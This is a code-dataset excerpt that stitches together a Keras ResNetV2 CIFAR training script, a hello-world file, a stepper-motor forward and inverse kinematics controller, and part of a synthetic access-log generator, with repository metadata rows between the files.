# print(dataset_train) # <_OptionsDataset shapes: {image: (32, 32, 3), label: ()}, types: {image: tf.uint8, label: tf.int64}>
# print(dataset_test) # <_OptionsDataset shapes: {image: (32, 32, 3), label: ()}, types: {image: tf.uint8, label: tf.int64}>
# training data mean
# num_elem = 0.0
# data_mean = np.array([0.0, 0.0, 0.0])
# for elem in dataset_train:
# z = np.copy(tf.dtypes.cast(elem["image"], tf.float32))
# data_mean = data_mean + np.mean(z, axis=(0, 1))
# num_elem = num_elem + 1.0
# data_mean = data_mean/num_elem
# data_mean = data_mean.reshape(1, 1, 3)
# print(data_mean)
# training data std dev
# num_elem = 0.0
# data_std = np.array([0.0, 0.0, 0.0])
# for elem in dataset_train:
# z = np.copy(tf.dtypes.cast(elem["image"], tf.float32))
# data_std = data_std + np.sum((z - data_mean)*(z - data_mean), axis=(0, 1))/float(DATA_ROWS*DATA_COLS)
# num_elem = num_elem + 1.0
# data_std = data_std/num_elem
# data_std = np.sqrt(data_std)
# data_std = data_std.reshape(1, 1, 3)
# print(data_std)
# transform training dataset
dataset_train = dataset_train.map(pre_processing_train, num_parallel_calls=4)
dataset_train = dataset_train.shuffle(buffer_size=TRAINING_SHUFFLE_BUFFER)
dataset_train = dataset_train.batch(TRAINING_BATCH_SIZE)
dataset_train = dataset_train.prefetch(buffer_size=1)
# transform testing dataset
dataset_test = dataset_test.map(pre_processing_test, num_parallel_calls=4)
dataset_test = dataset_test.batch(TRAINING_BATCH_SIZE)
dataset_test = dataset_test.prefetch(buffer_size=1)
# debug - datasets after transformation
# print(dataset_train) # <PrefetchDataset shapes: ((None, 28, 28, 3), (None,)), types: (tf.float32, tf.int32)>
# print(dataset_test) # <PrefetchDataset shapes: ((None, 28, 28, 3), (None,)), types: (tf.float32, tf.int32)>
################################################################################
#
# MODEL
#
################################################################################
# create and compile model
def create_model(rows, cols, channels, level_0_blocks, level_1_blocks, level_2_blocks, num_classes, lr_initial):
# encoder - input
model_input = keras.Input(shape=(rows, cols, channels), name='input_image')
x = model_input
# encoder - tail
x = keras.layers.Conv2D(32, 3, strides=1, padding='same', activation=None, use_bias=False)(x)
# encoder - level 0 - special bottleneck - repeat 1x
# input
# tensor: 28 x 28 x 32
# residual path
# filter: 32 x 1 x 1 x 32
# filter: 32 x 3 x 3 x 32
# filter: 128 x 1 x 1 x 32
# main path
# filter: 128 x 1 x 1 x 32
# output
# tensor: 28 x 28 x 128
residual = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(x)
residual = keras.layers.ReLU()(residual)
residual = keras.layers.Conv2D(32, 1, strides=1, padding='same', activation=None, use_bias=False)(residual)
residual = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(residual)
residual = keras.layers.ReLU()(residual)
residual = keras.layers.Conv2D(32, 3, strides=1, padding='same', activation=None, use_bias=False)(residual)
residual = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(residual)
residual = keras.layers.ReLU()(residual)
residual = keras.layers.Conv2D(128, 1, strides=1, padding='same', activation=None, use_bias=False)(residual)
x = keras.layers.Conv2D(128, 1, strides=1, padding='same', activation=None, use_bias=False)(x)
x = keras.layers.Add()([x, residual])
# encoder - level 0 - standard bottleneck - repeat (level_0_blocks - 1)x
# input
# tensor: 28 x 28 x 128
# residual path
# filter: 32 x 1 x 1 x 128
# filter: 32 x 3 x 3 x 32
# filter: 128 x 1 x 1 x 32
# main path
# filter: identity
# output
# tensor: 28 x 28 x 128
for n0 in range(level_0_blocks - 1):
residual = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(x)
residual = keras.layers.ReLU()(residual)
residual = keras.layers.Conv2D(32, 1, strides=1, padding='same', activation=None, use_bias=False)(residual)
residual = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(residual)
residual = keras.layers.ReLU()(residual)
residual = keras.layers.Conv2D(32, 3, strides=1, padding='same', activation=None, use_bias=False)(residual)
residual = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(residual)
residual = keras.layers.ReLU()(residual)
residual = keras.layers.Conv2D(128, 1, strides=1, padding='same', activation=None, use_bias=False)(residual)
x = keras.layers.Add()([x, residual])
# encoder - level 1 - down sampling bottleneck - repeat 1x
# input
# tensor: 28 x 28 x 128
# residual path
# filter: 64 x 1 x 1 x 128 / 2
# filter: 64 x 3 x 3 x 64
# filter: 256 x 1 x 1 x 64
# main path
# filter: 256 x 1 x 1 x 128 / 2
# output
# tensor: 14 x 14 x 256
residual = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(x)
residual = keras.layers.ReLU()(residual)
residual = keras.layers.Conv2D(64, 1, strides=2, padding='same', activation=None, use_bias=False)(residual)
residual = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(residual)
residual = keras.layers.ReLU()(residual)
residual = keras.layers.Conv2D(64, 3, strides=1, padding='same', activation=None, use_bias=False)(residual)
residual = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(residual)
residual = keras.layers.ReLU()(residual)
residual = keras.layers.Conv2D(256, 1, strides=1, padding='same', activation=None, use_bias=False)(residual)
x = keras.layers.Conv2D(256, 1, strides=2, padding='same', activation=None, use_bias=False)(x)
x = keras.layers.Add()([x, residual])
# encoder - level 1 - standard bottleneck - repeat (level_1_blocks - 1)x
# input
# tensor: 14 x 14 x 256
# residual path
# filter: 64 x 1 x 1 x 256
# filter: 64 x 3 x 3 x 64
# filter: 256 x 1 x 1 x 64
# main path
# filter: identity
# output
# tensor: 14 x 14 x 256
for n1 in range(level_1_blocks - 1):
residual = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(x)
residual = keras.layers.ReLU()(residual)
residual = keras.layers.Conv2D(64, 1, strides=1, padding='same', activation=None, use_bias=False)(residual)
residual = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(residual)
residual = keras.layers.ReLU()(residual)
residual = keras.layers.Conv2D(64, 3, strides=1, padding='same', activation=None, use_bias=False)(residual)
residual = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(residual)
residual = keras.layers.ReLU()(residual)
residual = keras.layers.Conv2D(256, 1, strides=1, padding='same', activation=None, use_bias=False)(residual)
x = keras.layers.Add()([x, residual])
# encoder - level 2 - down sampling bottleneck - repeat 1x
# input
# tensor: 14 x 14 x 256
# residual path
# filter: 128 x 1 x 1 x 256 / 2
# filter: 128 x 3 x 3 x 128
# filter: 512 x 1 x 1 x 128
# main path
# filter: 512 x 1 x 1 x 256 / 2
# output
# tensor: 7 x 7 x 512
residual = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(x)
residual = keras.layers.ReLU()(residual)
residual = keras.layers.Conv2D(128, 1, strides=2, padding='same', activation=None, use_bias=False)(residual)
residual = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(residual)
residual = keras.layers.ReLU()(residual)
residual = keras.layers.Conv2D(128, 3, strides=1, padding='same', activation=None, use_bias=False)(residual)
residual = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(residual)
residual = keras.layers.ReLU()(residual)
residual = keras.layers.Conv2D(512, 1, strides=1, padding='same', activation=None, use_bias=False)(residual)
x = keras.layers.Conv2D(512, 1, strides=2, padding='same', activation=None, use_bias=False)(x)
x = keras.layers.Add()([x, residual])
# encoder - level 2 - standard bottleneck - repeat (level_2_blocks - 1)x
# input
# tensor: 7 x 7 x 512
# residual path
# filter: 128 x 1 x 1 x 512
# filter: 128 x 3 x 3 x 128
# filter: 512 x 1 x 1 x 128
# main path
# filter: identity
# output
# tensor: 7 x 7 x 512
for n2 in range(level_2_blocks - 1):
residual = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(x)
residual = keras.layers.ReLU()(residual)
residual = keras.layers.Conv2D(128, 1, strides=1, padding='same', activation=None, use_bias=False)(residual)
residual = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(residual)
residual = keras.layers.ReLU()(residual)
residual = keras.layers.Conv2D(128, 3, strides=1, padding='same', activation=None, use_bias=False)(residual)
residual = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(residual)
residual = keras.layers.ReLU()(residual)
residual = keras.layers.Conv2D(512, 1, strides=1, padding='same', activation=None, use_bias=False)(residual)
x = keras.layers.Add()([x, residual])
# encoder - level 2 - standard bottleneck complete
# input
# tensor: 7 x 7 x 512
# main path
# batch norm
# ReLU
# output
# tensor: 7 x 7 x 512
x = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(x)
x = keras.layers.ReLU()(x)
# encoder - output
encoder_output = x
# decoder
y = keras.layers.GlobalAveragePooling2D()(encoder_output)
decoder_output = keras.layers.Dense(num_classes, activation='softmax')(y)
# forward path
model = keras.Model(inputs=model_input, outputs=decoder_output, name='resnetv2_model')
# loss, backward path (implicit) and weight update
model.compile(optimizer=tf.keras.optimizers.Adam(lr_initial), loss='sparse_categorical_crossentropy', metrics=['accuracy'])
# return model
return model
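# example of factoring the repeated bottleneck pattern above into a helper
# (sketch only - not used by create_model; the helper name and the `project`
# flag are illustrative)
# def bottleneck_block(x, mid_channels, out_channels, stride=1, project=False):
#     residual = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(x)
#     residual = keras.layers.ReLU()(residual)
#     residual = keras.layers.Conv2D(mid_channels, 1, strides=stride, padding='same', activation=None, use_bias=False)(residual)
#     residual = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(residual)
#     residual = keras.layers.ReLU()(residual)
#     residual = keras.layers.Conv2D(mid_channels, 3, strides=1, padding='same', activation=None, use_bias=False)(residual)
#     residual = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(residual)
#     residual = keras.layers.ReLU()(residual)
#     residual = keras.layers.Conv2D(out_channels, 1, strides=1, padding='same', activation=None, use_bias=False)(residual)
#     if project:
#         x = keras.layers.Conv2D(out_channels, 1, strides=stride, padding='same', activation=None, use_bias=False)(x)
#     return keras.layers.Add()([x, residual])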
# create and compile model
model = create_model(DATA_CROP_ROWS, DATA_CROP_COLS, DATA_CHANNELS, MODEL_LEVEL_0_BLOCKS, MODEL_LEVEL_1_BLOCKS, MODEL_LEVEL_2_BLOCKS, DATA_NUM_CLASSES, TRAINING_LR_MAX)
# model description and figure
model.summary()
keras.utils.plot_model(model, 'cifar_model.png', show_shapes=True)
################################################################################
#
# TRAIN AND VALIDATE
#
################################################################################
# learning rate schedule
def lr_schedule(epoch):
# staircase
# lr = TRAINING_LR_MAX*math.pow(TRAINING_LR_SCALE, math.floor(epoch/TRAINING_LR_EPOCHS))
# linear warmup followed by cosine decay
if epoch < TRAINING_LR_INIT_EPOCHS:
lr = (TRAINING_LR_MAX - TRAINING_LR_INIT)*(float(epoch)/TRAINING_LR_INIT_EPOCHS) + TRAINING_LR_INIT
else:
lr = (TRAINING_LR_MAX - TRAINING_LR_FINAL)*max(0.0, math.cos(((float(epoch) - TRAINING_LR_INIT_EPOCHS)/(TRAINING_LR_FINAL_EPOCHS - 1.0))*(math.pi/2.0))) + TRAINING_LR_FINAL
# debug - learning rate display
# print(epoch)
# print(lr)
return lr
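# example of visualizing the learning rate schedule (sketch only - uncomment
# to run; reuses the matplotlib import above)
# lr_per_epoch = [lr_schedule(epoch) for epoch in range(TRAINING_NUM_EPOCHS)]
# plt.plot(lr_per_epoch)
# plt.xlabel('epoch')
# plt.ylabel('learning rate')
# plt.show()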
# plot training accuracy and loss curves
def plot_training_curves(history):
# training and validation data accuracy
acc = history.history['accuracy']
val_acc = history.history['val_accuracy']
# training and validation data loss
loss = history.history['loss']
val_loss = history.history['val_loss']
# plot accuracy
plt.figure(figsize=(8, 8))
plt.subplot(2, 1, 1)
plt.plot(acc, label='Training Accuracy')
plt.plot(val_acc, label='Validation Accuracy')
plt.legend(loc='lower right')
plt.ylabel('Accuracy')
plt.ylim([min(plt.ylim()), 1])
plt.title('Training and Validation Accuracy')
# plot loss
plt.subplot(2, 1, 2)
plt.plot(loss, label='Training Loss')
plt.plot(val_loss, label='Validation Loss')
plt.legend(loc='upper right')
plt.ylabel('Cross Entropy')
plt.ylim([0, 2.0])
plt.title('Training and Validation Loss')
plt.xlabel('epoch')
plt.show()
# callbacks (learning rate schedule, model checkpointing during training)
callbacks = [keras.callbacks.LearningRateScheduler(lr_schedule),
keras.callbacks.ModelCheckpoint(filepath=SAVE_MODEL_PATH+'model_{epoch}.h5', save_best_only=True, monitor='val_loss', verbose=1)]
# training
initial_epoch_num = 0
history = model.fit(x=dataset_train, epochs=TRAINING_NUM_EPOCHS, verbose=1, callbacks=callbacks, validation_data=dataset_test, initial_epoch=initial_epoch_num)
# example of restarting training after a crash from the last saved checkpoint
# model = create_model(DATA_CROP_ROWS, DATA_CROP_COLS, DATA_CHANNELS, MODEL_LEVEL_0_BLOCKS, MODEL_LEVEL_1_BLOCKS, MODEL_LEVEL_2_BLOCKS, DATA_NUM_CLASSES, TRAINING_LR_MAX)
# model.load_weights(SAVE_MODEL_PATH+'model_X.h5') # replace X with the last saved checkpoint number
# initial_epoch_num = X # replace X with the last saved checkpoint number
# history = model.fit(x=dataset_train, epochs=TRAINING_NUM_EPOCHS, verbose=1, callbacks=callbacks, validation_data=dataset_test, initial_epoch=initial_epoch_num)
# plot accuracy and loss curves
plot_training_curves(history)
################################################################################
#
# TEST
#
################################################################################
# test
test_loss, test_accuracy = model.evaluate(x=dataset_test)
print('Test loss: ', test_loss)
print('Test accuracy: ', test_accuracy)
# example of saving and loading the model in Keras H5 format
# this saves both the model and the weights
# model.save('./save/model/model.h5')
# new_model = keras.models.load_model('./save/model/model.h5')
# predictions = model.predict(x=dataset_test)
# new_predictions = new_model.predict(x=dataset_test)
# np.testing.assert_allclose(predictions, new_predictions, atol=1e-6)
# example of saving and loading the model in TensorFlow SavedModel format
# this saves both the model and the weights
# keras.experimental.export_saved_model(model, './save/model/')
# new_model = keras.experimental.load_from_saved_model('./save/model/')
# predictions = model.predict(x=dataset_test)
# new_predictions = new_model.predict(x=dataset_test)
# np.testing.assert_allclose(predictions, new_predictions, atol=1e-6)
# example of getting a list of all feature maps
# feature_map_list = [layer.output for layer in model.layers]
# print(feature_map_list)
# example of creating a model encoder
# replace X with the layer number of the encoder output
# model_encoder = keras.Model(inputs=model.input, outputs=model.layers[X].output)
# model_encoder.summary()
################################################################################
#
# DISPLAY
#
################################################################################
# extract a batch from the testing dataset
# then extract images and labels for this batch
dataset_display = dataset_test.take(1)
it = iter(dataset_display)
display_images, display_labels = next(it)
# predict pmf and labels for this dataset
predict_labels_pmf = model.predict(x=dataset_display)
predict_labels = np.argmax(predict_labels_pmf, axis=1)
# for display normalize images to [0, 1]
display_images = ((display_images*DATA_STD_DEV.reshape((1, 1, 1, 3))) + DATA_MEAN.reshape((1, 1, 1, 3)))/255.0
# cycle through the images in the batch
for image_index in range(predict_labels.size):
# display the predicted label, actual label and image
print('Predicted label: {0:1d} and actual label: {1:1d}'.format(predict_labels[image_index], display_labels[image_index]))
plt.imshow(display_images[image_index, :, :, :])
plt.show()
| [
"[email protected]"
]
| |
06e0a0b0461ac2a9d3ce0c4a8a28f8a13dbfd295 | bbf82010b3dab5ba35331d15166750818bf22b37 | /experiment_1.py | 70a1cb22e4e88318831113a5ff0c125ad123d8e0 | []
| no_license | seregichevks/Diploma-Instacart-Market-Basket-Analysis | 889d068fd5be1c48c3fcbc7d7e58af1b771d58b9 | 3771add03e2d488df8fb8fdb19a9785be7bfc7cd | refs/heads/master | 2023-07-05T07:46:34.480429 | 2021-08-24T04:57:02 | 2021-08-24T04:57:02 | 399,338,596 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 42 | py | print('Hello world')
print('Hello world')
| [
"[email protected]"
]
| |
5430ad132d8586b098a6dbb7f055a06b6339da62 | e1db880dc68e16b6947cc6920643245ae37a7cdd | /Kinematics/Forward_and_Inverse_kinematic.py | 187e10f8e6fefc64613f3d5a05bb2568be1964c6 | []
| no_license | zhezhou1993/Germian_Spp2 | 872ceddd7c8e60a452c23dd5b940e693b2dc5223 | 22c269c3368cc60a8ed0fde5a20d036231d0c337 | refs/heads/master | 2020-12-07T15:38:43.352777 | 2015-12-15T05:43:14 | 2015-12-15T05:43:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,655 | py | __author__ = 'germain'
'''The code is developed to control the stepper motor for SPP2 project IK testing'''
#Import several libraries
from ctypes import *
import sys
from time import sleep
#Phidget specific imports
from Phidgets.PhidgetException import PhidgetErrorCodes, PhidgetException
from Phidgets.Events.Events import AttachEventArgs, DetachEventArgs, ErrorEventArgs, InputChangeEventArgs, CurrentChangeEventArgs, StepperPositionChangeEventArgs, VelocityChangeEventArgs
from Phidgets.Devices.Stepper import Stepper
from Phidgets.Phidget import PhidgetLogLevel
from kinematics import *
from stepper_motor_setup import *
import math
#Define several important factors about the two stepper motors
STEPPER_1_CIRCLE = 16457
STEPPER_2_CIRCLE = 85970
h2 = 1550.0
r1 = 30.0
r2 = 35.0
try:
stepper = Stepper()
#Create a new device object
stepper_1 = Stepper()
except RuntimeError as e:
print("Runtime Exception:%s"% e.details)
print("Exiting....")
exit(1)
#Information Display Function
def DisplayDeviceInfo():
print("|------------|----------------------------------|--------------|------------|")
print("|- Attached -|- Type -|- Serial No. -|- Version -|")
print("|------------|----------------------------------|--------------|------------|")
print("|- %8s -|- %30s -|- %10d -|- %8d -|" % (stepper.isAttached(), stepper.getDeviceName(), stepper.getSerialNum(), stepper.getDeviceVersion()))
print("|------------|----------------------------------|--------------|------------|")
print("Number of Motors: %i" % (stepper.getMotorCount()))
#Event Handler Callback Functions
def StepperAttached(e):
attached = e.device
print("Stepper %i Attached!" % (attached.getSerialNum()))
def StepperDetached(e):
detached = e.device
print("Stepper %i Detached!" % (detached.getSerialNum()))
def StepperError(e):
try:
source = e.device
print("Stepper %i: Phidget Error %i: %s" % (source.getSerialNum(), e.eCode, e.description))
except PhidgetException as e:
print("Phidget Exception %i: %s" % (e.code, e.details))
# def StepperCurrentChanged(e):
# source = e.device
# print("Stepper %i: Motor %i -- Current Draw: %6f" % (source.getSerialNum(), e.index, e.current))
#
# def StepperInputChanged(e):
# source = e.device
# print("Stepper %i: Input %i -- State: %s" % (source.getSerialNum(), e.index, e.state))
#
# def StepperPositionChanged(e):
# source = e.device
# print("Stepper %i: Motor %i -- Position: %f" % (source.getSerialNum(), e.index, e.position))
#
# def StepperVelocityChanged(e):
# source = e.device
# print("Stepper %i: Motor %i -- Velocity: %f" % (source.getSerialNum(), e.index, e.velocity))
#Control the stepper motors by converting angles to steps
def step2angel(step,motor_index):
if motor_index == 1:
fraction = float(step)/STEPPER_1_CIRCLE
degree = 360*fraction
return degree
else:
fraction = float(step)/STEPPER_2_CIRCLE
degree = 360*fraction
return degree
def angel2step(angel,motor_index):
if motor_index == 1:
step = int(angel/0.35*16)
return step
else:
step = int(angel/0.067*16)
return step
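#sanity-check sketch (added note; values illustrative): the two conversions
#should roughly invert each other for motor 1, since 0.35/16 = 0.021875
#deg/step agrees with 360/STEPPER_1_CIRCLE = 360/16457 = 0.021874 deg/step:
#  angel2step(90, 1)   -> int(90/0.35*16)  = 4114 steps
#  step2angel(4114, 1) -> 360*4114/16457   = 89.99 degrees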
#Main Program Code
try:
#logging example, uncomment to generate a log file
#stepper.enableLogging(PhidgetLogLevel.PHIDGET_LOG_VERBOSE, "phidgetlog.log")
stepper.setOnAttachHandler(StepperAttached)
stepper.setOnDetachHandler(StepperDetached)
stepper.setOnErrorhandler(StepperError)
#stepper.setOnCurrentChangeHandler(StepperCurrentChanged)yt
# stepper.setOnInputChangeHandler(StepperInputChanged)
# stepper.setOnPositionChangeHandler(StepperPositionChanged)
# stepper.setOnVelocityChangeHandler(StepperVelocityChanged)
#do the samething for stepper_1
stepper_1.setOnAttachHandler(StepperAttached)
stepper_1.setOnDetachHandler(StepperDetached)
stepper_1.setOnErrorhandler(StepperError)
#stepper_1.setOnCurrentChangeHandler(StepperCurrentChanged)
# stepper_1.setOnInputChangeHandler(StepperInputChanged)
# stepper_1.setOnPositionChangeHandler(StepperPositionChanged)
# stepper_1.setOnVelocityChangeHandler(StepperVelocityChanged)
except PhidgetException as e:
print("Phidget Exception %i: %s" % (e.code, e.details))
print("Exiting....")
exit(1)
print("Opening phidget object....")
try:
stepper.openPhidget(serial = 398177)
stepper_1.openPhidget(serial = 398175)
except PhidgetException as e:
print("Phidget Exception %i: %s" % (e.code, e.details))
print("Exiting....")
exit(1)
print("Waiting for attach....")
try:
stepper.waitForAttach(10000)
stepper_1.waitForAttach(10000)
except PhidgetException as e:
print("Phidget Exception %i: %s" % (e.code, e.details))
try:
stepper.closePhidget()
stepper_1.closePhidget()
except PhidgetException as e:
print("Phidget Exception %i: %s" % (e.code, e.details))
print("Exiting....")
exit(1)
print("Exiting....")
exit(1)
else:
DisplayDeviceInfo()
#Here We start our code to move the motor as we expected
try:
#set up the zero position
stepper.setCurrentPosition(0,0)
stepper_1.setCurrentPosition(0,0)
#Start the stepper motors
stepper.setEngaged(0,True)
stepper_1.setEngaged(0,True)
#Set up the speed, acceleration,and current
setup_limit(stepper,0,1645*10,1.5,1645*10)#speed normally 4000
setup_limit(stepper_1,0,8597*10,1.0,8597*10)
sleep(2)
try:
#report where they are
print ("the current position for motor 1 is %lf"% (step2angel(stepper.getCurrentPosition(0),1)))
print ("the current position for motor 2 is %lf"% (step2angel(stepper_1.getCurrentPosition(0),2)))
while(True):
model = raw_input("Please choose model, 1 for FK, 2 for IK, 3 for back to initial position, 4 for exit")
if model == "1":
target_degree_theta1= float(raw_input("Please enter the degree of bottom motor:"))
target_degree_theta2= float(raw_input("Please enter the degree of upper motor:"))
if target_degree_theta2 <= 0:
print "Warnning! Cannot caululate FK"
elif target_degree_theta1 > 0:
target_position_stepper = angel2step(target_degree_theta1,1)
target_position_stepper_1 = angel2step(target_degree_theta2,2)
stepper.setTargetPosition(0,target_position_stepper)
stepper_1.setTargetPosition(0,-1*target_position_stepper_1)
target_degree_theta1 = math.radians(float(target_degree_theta1))
target_degree_theta2 = math.radians(float(target_degree_theta2))
b = (h2 + r2*math.cos(target_degree_theta2))/math.tan(target_degree_theta2)+r2*math.sin(target_degree_theta2)+r1*math.tan(target_degree_theta1)
FK_X = r1/math.cos(target_degree_theta1)-b*math.sin(target_degree_theta1)
FK_Y = b*math.cos(target_degree_theta1)
print("real_world_codinate: (%lf,%lf)"%(FK_X,FK_Y))
elif target_degree_theta1 < 0:
target_position_stepper = angel2step(target_degree_theta1,1)
target_position_stepper_1 = angel2step(target_degree_theta2,2)
stepper.setTargetPosition(0,target_position_stepper)
stepper_1.setTargetPosition(0,-1*target_position_stepper_1)
target_degree_theta1 = math.radians(float(target_degree_theta1))
target_degree_theta2 = math.radians(float(target_degree_theta2))
b = (h2 + r2*math.cos(target_degree_theta2))/math.tan(target_degree_theta2)+r2*math.sin(target_degree_theta2)+r1/math.tan(-1*target_degree_theta1)
FK_X = b*math.sin(-1.0*target_degree_theta1)
FK_Y = b*math.cos(-1.0*target_degree_theta1)-r1/math.sin(-1.0*target_degree_theta1)
print("real_world_codinate: (%lf,%lf)"%(FK_X,FK_Y))
elif target_degree_theta1 == 0:
target_position_stepper = angel2step(target_degree_theta1,1)
target_position_stepper_1 = angel2step(target_degree_theta2,2)
stepper.setTargetPosition(0,target_position_stepper)
stepper_1.setTargetPosition(0,-1*target_position_stepper_1)
target_degree_theta1 = math.radians(float(target_degree_theta1))
target_degree_theta2 = math.radians(float(target_degree_theta2))
FK_X = r1
FK_Y = (h2 + r2*math.cos(target_degree_theta2))/math.tan(target_degree_theta2)+r2*math.sin(target_degree_theta2)
print("real_world_codinate: (%lf,%lf)"%(FK_X,FK_Y))
else:
pass
elif model == "2":
target_real_world_x = float(raw_input("Please enter the real world X:"))
target_real_world_y = float(raw_input("Please enter the real world Y:"))
if target_real_world_y < 0:
print "not reachable"
target_degree_theta1 = 0
target_degree_theta2 = 0
elif target_real_world_x > r1:
target_degree_theta1 = -1.0*math.degrees(math.acos(r1/math.sqrt(target_real_world_x**2+target_real_world_y**2))-math.atan(abs(target_real_world_y)/abs(target_real_world_x)))
target_degree_theta2 = (90.0-math.degrees(math.pi/2.0-math.atan(h2/math.sqrt(target_real_world_x**2+target_real_world_y**2-r1**2))-math.atan(r2/math.sqrt(target_real_world_x**2+target_real_world_y**2-r1**2+h2**2))))
else:
target_degree_theta1 = math.degrees(math.pi-math.acos(r1/math.sqrt(target_real_world_x**2+target_real_world_y**2))-math.atan(abs(target_real_world_y)/abs(target_real_world_x)))
target_degree_theta2 = math.degrees(math.pi-math.atan(math.sqrt(target_real_world_x**2+target_real_world_y**2-r1**2)/h2)-math.acos(r2/math.sqrt(target_real_world_x**2+target_real_world_y**2-r1**2+h2**2)))
print target_degree_theta1,target_degree_theta2
target_position_stepper = angel2step(float(target_degree_theta1),1)
target_position_stepper_1 = angel2step(float(target_degree_theta2),2)
stepper.setTargetPosition(0,target_position_stepper)
stepper_1.setTargetPosition(0,-1*target_position_stepper_1)
elif model == "3":
stepper.setTargetPosition(0,0)
stepper_1.setTargetPosition(0,0)
elif model == "4":
break
else:
print "ERROR INPUT"
while (stepper.getCurrentPosition(0) != stepper.getTargetPosition(0)):
pass
while (stepper_1.getCurrentPosition(0) != stepper_1.getTargetPosition(0)):
pass
sleep(1)
# print ("the current position for motor 1 is %lf"% (stepper.getCurrentPosition(0)))
# print ("the current position for motor 2 is %lf"% (stepper_1.getCurrentPosition(0)))
except KeyboardInterrupt:
pass
print("down")
stepper.setEngaged(0,False)
stepper_1.setEngaged(0,False)
sleep(1)
stepper.closePhidget()
stepper_1.closePhidget()
except PhidgetException as e:
print("Phidget Exception %i: %s" % (e.code, e.details))
print("Exiting....")
exit(1)
exit(0)
| [
"[email protected]"
]
| |
d56af36783dc15d48fb3fb5238e7be00ed6cda35 | ca76a15c1ecdeb848683bc3b58e849f08a639b8b | /src/main/scala/com/ww/sparksql/statproject/datasource/GenNetAccessLog.py | c5d9e3d08533fb4dd4cac13046179474e607e25b | []
| no_license | l838224553/Spark | b8bd422f5fa9f0554fdba6646b8ca8659ce0600c | 45046eec63c04062590e5e03cdfffb6ed968d8ef | refs/heads/master | 2022-07-22T09:14:30.984045 | 2020-05-14T08:34:23 | 2020-05-14T08:34:23 | 261,978,226 | 0 | 0 | null | 2020-05-07T11:14:24 | 2020-05-07T07:18:22 | null | UTF-8 | Python | false | false | 2,840 | py | #!/usr/bin/python
# -*- coding: UTF-8 -*-
import random
from random import randint
import time
__author__ = "wwcom123"
# [Data stream 1]: data source
# To make the statistics easy to verify later, only generate data for one month and a few days
month = ["DEC"]
day = list(range(24, 27, 1))
hour = list(range(10, 24, 1))
minute_second = list(range(10, 60, 1))
# Ranges for the 4 IPv4 address octets
ip_slices = list(range(2, 254, 1))
http_method = ["POST" ,"GET"]
# Simulated URL paths
url_path = [
"video/1001",
"video/1002",
"video/1003",
"video/1004",
"video/1005",
"video/1006",
"audio/1001",
"audio/1002",
"book/1001",
"book/1002",
"book/1003"
]
# Simulated HTTP status codes to return
http_status = ["200", "404", "500"]
# Simulated traffic volume in bytes
traffic = list(range(2000, 8000, 1))
# join() concatenates the elements of a sequence, separated by the string on its left, into a new string
# Randomly generate a source IP address
def sample_ip():
ip_slice_sample4 = random.sample(ip_slices, 4)
return ".".join(str(x) for x in ip_slice_sample4)
# Randomly generate a log timestamp in [11/DEC/2018:03:04:05 +0800] format
def sample_time():
min_sec = random.sample(minute_second,2)
min_sec_join = str(":".join(str(x) for x in min_sec))
hour_join = str(random.sample(hour, 1)[0])
day_join = str(random.sample(day ,1)[0])
month_join = random.sample(month ,1)[0]
return "[" + day_join + "/" + month_join + "/2018 " + hour_join + ":" + min_sec_join + " +0800]"
# Simulated traffic byte count, drawn at random for each record
def sample_traffic():
return str(random.sample(traffic,1)[0])
# random.sample draws n elements at random from sequence a and returns them as a list
# Randomly generate the URL path the user visits
def sample_url():
return random.sample(url_path, 1)[0]
# Generate the clicked-URL field of the log record
def sample_url_click():
